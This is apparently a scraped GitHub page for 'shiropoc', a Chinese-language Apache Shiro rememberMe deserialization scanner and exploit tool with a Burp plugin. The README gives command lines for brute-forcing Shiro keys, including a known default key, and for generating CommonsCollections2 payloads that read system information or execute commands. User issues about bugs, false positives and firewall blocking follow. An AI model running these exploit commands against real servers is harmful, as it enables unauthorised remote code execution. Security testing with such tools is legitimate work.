potats0 / shiropoc Goto Github PK

View Code? Open in Web Editor NEW

321.0 10.0 55.0 79 KB

Java 100.00%

shiropoc's Introduction

mvn package 编译

欢迎关注宽字节安全公众号

changelog

新增shiro 检测方式(对，就是那个不需要gadget的检测方式) 2020.7.30
新增shiro 100 key
支持自定义key
支持作为插件导入burp
支持burp的被动扫描（需要burp pro版本

被动扫描演示

检测到shiro框架

自动探测shiro的key

burp插件使用方法

repeater界面中右键，生成payload 默认kph密钥，cc2利用链，获取信息，如果需要修改，请右键选择config

生成后，会自动替换request内容，并攻击

当然，这个jar包也可以直接在命令行下运行，生成rememberMe，或者检测，一切不变

自定义key检测

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/ kPH+bIxk5D2deZiIxcaaaA==

内置100key检测

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/

java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar kPH+bIxk5D2deZiIxcaaaA== CommonsCollections2 XraySysProp

检测方式

运行

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc

检测

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/

shiro-urldns 检测&利用工具

支持shiro 16个key，支持攻击利用。支持的key与gadget以及攻击类型如下

查看目标服务器的系统信息

该攻击类型为XraySysProp，使用方法如下

java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XraySysProp

利用截图如下

执行命令并回显

该攻击类型为XrayCmd 使用方法如下

java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XrayCmd

利用截图如下

注意事项

建议删除不相关的http请求头，不然会因为http请求头过大而提示400错误
建议使用CommonsCollections2 gadget，体积小，利用率高

shiropoc's People

Contributors

Stargazers

Watchers

shiropoc's Issues

key异常

里面有一个key异常了？

jar包命令行无法scan

exp存在强特征被防火墙拦截

命令执行exp使用了cmd作为HTTP请求头，某些防火墙发现存在这个请求包后会拦截。

命令行运行jar报错

编译失败

jar包生成POC后请求请求路径和请求方法会被删除，导致400

原始请求

生成POC后

另外，大佬这个怎么自定义命令，默认是whoami，我测试的这个靶机没回显的，想修改为其他命令测试

检测某个站出现误报情况

                                                            Powered by UnicodeSec
                                                                  Version  0.0.2
八月 01, 2020 4:31:56 下午 org.apache.http.client.protocol.ResponseProcessCookies processCookies
警告: Invalid cookie header: "Set-Cookie: 8VY9p00ccvVgS=5s7CnSS.ODpwYT_v50JzmQn.x0G6eIvX0a8hwJN_WEumAi_mwmJTdsCMnZzgt1NxHtMXnLqaQe.bUAFr1uZ83Cq; Path=/; expires=Tue, 3
0 Jul 2030 08:32:54 GMT; HttpOnly". Invalid 'expires' attribute: Tue, 30 Jul 2030 08:32:54 GMT
found Shiro Vulnerability, Shiro key wGiHplamyXlVB11UXWol8g==

授权测试某站时，发现返回头里没有rememberMe=deleteMe相关字段并且会默认返回Set-Cookie相关的字段，但是检测出了key，日志如上图，返回头如下图

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Aug 2020 08:31:57 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Set-Cookie: sid=z0Tscj1n+2962467490-Nd1D_qJ28lD1diGfMbUlBWZ1Bf12So0Zi0wwzMr8UiilkY..vOKPORkhuzylS87u68qiFJTKD37xlQTLdabG_a; Path=/xlplatform; HttpOnly
Content-Language: en-US
Pragma: no-cache
Cache-Control: no-store
Expires: Sat, 01 Aug 2020 08:32:54 GMT
Set-Cookie: 8VY9p00ccvVgS=5s7CnSS.ODpwYT_v50JzmQn.x0G6eIvX0a8hwJN_WEumAi_mwmJTdsCMnZzgt1NxHtMXnLqaQe.bUAFr1uZ83Cq; Path=/; expires=Tue, 30 Jul 2030 08:32:54 GMT; HttpOnly
Busscid: unnet
Content-Length: 26689

bug

java -cp shiroPoc-0.5-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/

直接使用jar检测的话，测试时发现bug，无论对任何URL检测都会返回成功

这个要结合其他工具使用吗，没找到那个运行的jar文件

师傅可以试试把gcm算法加入其中

师傅可以试试把gcm算法加入其中，最近也见到了好多gcm的站）

错误: 找不到或无法加载主类 CommonsCollections10

λ java -cp shiroPoc-0.5-SNAPSHOT-jar-with-dependencies.jar CommonsCollections10 SpringBootEcho1
错误: 找不到或无法加载主类 CommonsCollections10
原因: java.lang.ClassNotFoundException: CommonsCollections10